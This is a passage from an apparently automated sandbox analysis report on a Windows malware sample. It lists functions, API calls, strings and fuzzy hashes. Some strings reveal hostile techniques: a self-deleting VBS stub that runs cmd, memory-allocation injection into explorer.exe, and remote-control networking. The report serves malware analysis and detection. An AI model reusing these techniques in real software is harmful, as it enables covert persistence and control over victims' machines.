                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F38E
                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3A0
                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3B2
                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3C4
                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3D6
                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3E8
                                                                                                                                                                                              • _free.LIBCMT ref: 004500B6
                                                                                                                                                                                                • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                              • _free.LIBCMT ref: 004500D8
                                                                                                                                                                                              • _free.LIBCMT ref: 004500ED
                                                                                                                                                                                              • _free.LIBCMT ref: 004500F8
                                                                                                                                                                                              • _free.LIBCMT ref: 0045011A
                                                                                                                                                                                              • _free.LIBCMT ref: 0045012D
                                                                                                                                                                                              • _free.LIBCMT ref: 0045013B
                                                                                                                                                                                              • _free.LIBCMT ref: 00450146
                                                                                                                                                                                              • _free.LIBCMT ref: 0045017E
                                                                                                                                                                                              • _free.LIBCMT ref: 00450185
                                                                                                                                                                                              • _free.LIBCMT ref: 004501A2
                                                                                                                                                                                              • _free.LIBCMT ref: 004501BA
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                              • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                                                                                              • Instruction ID: 71386be3831ae4e36ed8ba8c0666741f952bc44bbd11cc85bbb3aa2ad55dcdb0
                                                                                                                                                                                              • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                                                                                              • Instruction Fuzzy Hash: D5318135600B009FEB30AA39D845B5773E9EF02325F11842FE849E7692DF79AD88C719
                                                                                                                                                                                              Function 00419138 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174sleeptimeCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 0041913D
                                                                                                                                                                                              • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041916F
                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191FB
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0041927D
                                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 0041928C
                                                                                                                                                                                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419375
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                                                                                              • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                                                                                              • API String ID: 489098229-65789007
                                                                                                                                                                                              • Opcode ID: 987b661f2f94bb4b23b66fd70baf870604e4a68319259e1e5b8a0a3655f2dcde
                                                                                                                                                                                              • Instruction ID: 451d4021779863bb8065bd5e36f4a774b326d3833db1a6038cb7dac0f018a91b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 987b661f2f94bb4b23b66fd70baf870604e4a68319259e1e5b8a0a3655f2dcde
                                                                                                                                                                                              • Instruction Fuzzy Hash: 56519071A002449ACB14BBB5D866AFE7BA9AB45304F00407FF849B71D2EF3C5D85C799
                                                                                                                                                                                              Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147networkCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                                                              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                                                              • API String ID: 994465650-2151626615
                                                                                                                                                                                              • Opcode ID: 0e18f61abc9e3d8a2747cabaf845d162c66a56537a1401371773013c123a1612
                                                                                                                                                                                              • Instruction ID: feeaa4dc0a5480c3be004408dd81f6e2390fe6c9429734df96c13844dfc6b1ca
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e18f61abc9e3d8a2747cabaf845d162c66a56537a1401371773013c123a1612
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E4116B1B002026BCB04B77A8C4B66E7A55AB81354B40016FE901676D3FE79AD6087DF
                                                                                                                                                                                              Function 0040C66D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                                                                                                                                                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                                                                                                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                                                                                                                                                                • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                                                                                                                                                                • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                                                                                              • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                                                                                              • API String ID: 1913171305-390638927
                                                                                                                                                                                              • Opcode ID: cb2bafc17bd6d2fc7c2746a26f37568c25dfbde7b533674c545cbe9e54b8fc58
                                                                                                                                                                                              • Instruction ID: 3122975e65398275e0c1a8e950e5c558235310b29c64ef4ed93c25b66c9664dc
                                                                                                                                                                                              • Opcode Fuzzy Hash: cb2bafc17bd6d2fc7c2746a26f37568c25dfbde7b533674c545cbe9e54b8fc58
                                                                                                                                                                                              • Instruction Fuzzy Hash: A6414C329001185ACB14F761DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                                                                                                              Function 0044F3F1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                              • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                                                                                              • Instruction ID: d73775b2238990a9214358b8270f61d1b8324a28925b392a315ea9bfa7ac6158
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 89C16672D40204AFEB20DBA8CC82FEF77F8AB05714F15446AFA44FB282D6749D458768
                                                                                                                                                                                              Function 004047EB Relevance: 18.1, APIs: 12, Instructions: 66synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00475B90,?,?,00000000,00475B90,004017F3), ref: 004047FD
                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404808
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404811
                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 0040481F
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B90,004017F3), ref: 00404856
                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404867
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B90,004017F3), ref: 0040486E
                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404880
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404885
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 0040488A
                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404895
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 0040489A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3658366068-0
                                                                                                                                                                                              • Opcode ID: b48fac80ca5b148fdad783a92e94d640e15fce6fe8a7544b86a0cf0c1a1052f0
                                                                                                                                                                                              • Instruction ID: 6857b948c75ecf5e4d11b49f17ebd09eceef1c2fbc6fc14a1e153603fddcf20a
                                                                                                                                                                                              • Opcode Fuzzy Hash: b48fac80ca5b148fdad783a92e94d640e15fce6fe8a7544b86a0cf0c1a1052f0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A212C71144B149FDB216B26EC45A27BBE1EF40325F104A7EF2E212AF1CB76E851DB48
                                                                                                                                                                                              Function 00454992 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00454660: CreateFileW.KERNEL32(00000000,?,?,;JE,?,?,00000000,?,00454A3B,00000000,0000000C), ref: 0045467D
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00454AA6
                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00454AAD
                                                                                                                                                                                              • GetFileType.KERNEL32(00000000), ref: 00454AB9
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00454AC3
                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00454ACC
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00454AEC
                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00454C36
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00454C68
                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00454C6F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                              • API String ID: 4237864984-2852464175
                                                                                                                                                                                              • Opcode ID: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                                                                                                                                                              • Instruction ID: 2939135f81ce6efcdbf1290aa78a9ad6619f21b9340f77aa2193fadd435c2af6
                                                                                                                                                                                              • Opcode Fuzzy Hash: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9FA13732A041448FDF19DF68D8527AE7BA0EB46329F14015EFC019F392DB399C96C75A
                                                                                                                                                                                              Function 00413C67 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: 65535$udp
                                                                                                                                                                                              • API String ID: 0-1267037602
                                                                                                                                                                                              • Opcode ID: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                                                                                                                                                                                              • Instruction ID: 18155c1335c00501c0bec8b6c43ed7e13bdec9a75575f631fadbade58ebc7fa9
                                                                                                                                                                                              • Opcode Fuzzy Hash: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C411971604301ABD7209F29E9057AB77D8EF85706F04082FF84597391D76DCEC1866E
                                                                                                                                                                                              Function 00439371 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C9
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393D6
                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 004393DD
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439409
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439413
                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0043941A
                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043945D
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439467
                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0043946E
                                                                                                                                                                                              • _free.LIBCMT ref: 0043947A
                                                                                                                                                                                              • _free.LIBCMT ref: 00439481
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2441525078-0
                                                                                                                                                                                              • Opcode ID: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                                                                                                                                                              • Instruction ID: 6a201652548b5938c51769f65cd316b483991bd1e06270b2389e89ad89b884a4
                                                                                                                                                                                              • Opcode Fuzzy Hash: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                                                                                                                                                              • Instruction Fuzzy Hash: AA31007280860ABFDF11AFA5DC45CAF3B78EF09364F10416AF81096291DB79CC11DBA9
                                                                                                                                                                                              Function 00404E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                                                                                                              • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                                                                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                                                                              • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                                                                              • API String ID: 2956720200-749203953
                                                                                                                                                                                              • Opcode ID: a51964cc3bd14331006f3947e8af67d9827ab62082f85bb6a068cb08503db0d3
                                                                                                                                                                                              • Instruction ID: 321c3fbec734f1f8b9fff4e8d6f05c27936dabaea61c0bf38d797d3438e015d2
                                                                                                                                                                                              • Opcode Fuzzy Hash: a51964cc3bd14331006f3947e8af67d9827ab62082f85bb6a068cb08503db0d3
                                                                                                                                                                                              • Instruction Fuzzy Hash: F641BEB16043016BC614FB75D85A8AE77A8ABC1714F00093EF906A31E6EF38DA04C79A
                                                                                                                                                                                              Function 00416E27 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107filesynchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                                                                                                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                                                                                                              • String ID: <$@$@FG$@FG$Temp
                                                                                                                                                                                              • API String ID: 1107811701-2245803885
                                                                                                                                                                                              • Opcode ID: c05d817a371b4f656e6dcacff060beea23bdfd3fcde92ea16948289ad15499fb
                                                                                                                                                                                              • Instruction ID: 31b483d39f6b5d6935d3c54cd29663daa4ef68f058b88688fc76c4b473729b01
                                                                                                                                                                                              • Opcode Fuzzy Hash: c05d817a371b4f656e6dcacff060beea23bdfd3fcde92ea16948289ad15499fb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C318B319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                                                                                                                              Function 00406616 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 98COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00474A48,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00474A48,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\Desktop\4XYAW8PbZH.exe), ref: 00406705
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                              • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                                                                                                                              • API String ID: 2050909247-4145329354
                                                                                                                                                                                              • Opcode ID: 2c4cefaadf3906a4bff5f2a88e515bd7276069b26b3f954856ba32959abac89a
                                                                                                                                                                                              • Instruction ID: 85e9bb49d37c82d50cc0a876bfe2e9cbcca00efa80d213bdcfc81b1d75d5651e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c4cefaadf3906a4bff5f2a88e515bd7276069b26b3f954856ba32959abac89a
                                                                                                                                                                                              • Instruction Fuzzy Hash: FF31CA75240300AFC310AB6DEC49F6A7768EB44705F11443EF50AA76E1EB7998508B6D
                                                                                                                                                                                              Function 00419C95 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CA4
                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CBB
                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CC8
                                                                                                                                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CD7
                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CE8
                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CEB
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 221034970-0
                                                                                                                                                                                              • Opcode ID: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                                                                                                                                                              • Instruction ID: 64b7f8b9d702139b787b45b2ac21df1fde646642379ff803e7b0347eb9faadae
                                                                                                                                                                                              • Opcode Fuzzy Hash: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8711C631901218AFD7116B64EC85DFF3BECDB46BA1B000036F942921D1DB64CD46AAF5
                                                                                                                                                                                              Function 00446DDB Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _free.LIBCMT ref: 00446DEF
                                                                                                                                                                                                • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                              • _free.LIBCMT ref: 00446DFB
                                                                                                                                                                                              • _free.LIBCMT ref: 00446E06
                                                                                                                                                                                              • _free.LIBCMT ref: 00446E11
                                                                                                                                                                                              • _free.LIBCMT ref: 00446E1C
                                                                                                                                                                                              • _free.LIBCMT ref: 00446E27
                                                                                                                                                                                              • _free.LIBCMT ref: 00446E32
                                                                                                                                                                                              • _free.LIBCMT ref: 00446E3D
                                                                                                                                                                                              • _free.LIBCMT ref: 00446E48
                                                                                                                                                                                              • _free.LIBCMT ref: 00446E56
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                              • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                                                                                              • Instruction ID: 4059f081e6094245f9dcb18e84e070fbb06f55adf0c09f86c969ccb3ae0415ae
                                                                                                                                                                                              • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E11CB7550051CBFDB05EF55C842CDD3B76EF06364B42C0AAF9086F222DA75DE509B85
                                                                                                                                                                                              Function 00410314 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
